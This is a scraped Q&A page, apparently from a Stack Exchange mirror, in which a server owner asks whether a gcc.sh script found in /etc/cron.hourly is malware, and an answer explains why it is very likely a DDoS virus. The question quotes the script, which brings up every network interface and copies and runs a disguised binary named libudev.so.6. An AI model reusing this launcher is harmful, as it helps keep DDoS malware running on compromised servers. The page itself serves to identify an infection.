Is this file (gcc.sh) in cron.hourly malware?

Question 1

Is this file (gcc.sh) in cron.hourly malware?

linux exploit malware virus

checked01 · Apr 14, 2016 · Viewed 9.8k times · Source

Answer

Answer

Quite likely. It uses /lib/libudev.so.6 as an executable while the name implies it should be a library - try using a tool like nm or objdump to see if it's an executable. It copies from /lib/libudev.so to .so.6 - while normally the .so is a symlink to the versioned one. It also runs a for loop to bring up all network connections even if you've turned them off. It uses the name of a well-known compiler to look legit. I'd call this 99%+ likely a virus.

Found another reference to something calling itself gcc - https://superuser.com/questions/863997/ddos-virus-infection-as-a-unix-service-on-a-debian-8-vm-webserver . And yes, that's a DDoS virus on a unix system, exactly matching your problem.

Question 2

I have been experiencing spikes up to 1 Gbps on my server and have been looking for virus' and malware. I found this file: gcc.sh in /etc/cron.hourly and was wondering if anyone has seen anything like it, and would have some insight into the code. Thanks!

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/binfor i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6

Is this file (gcc.sh) in cron.hourly malware?

Answer

Related questions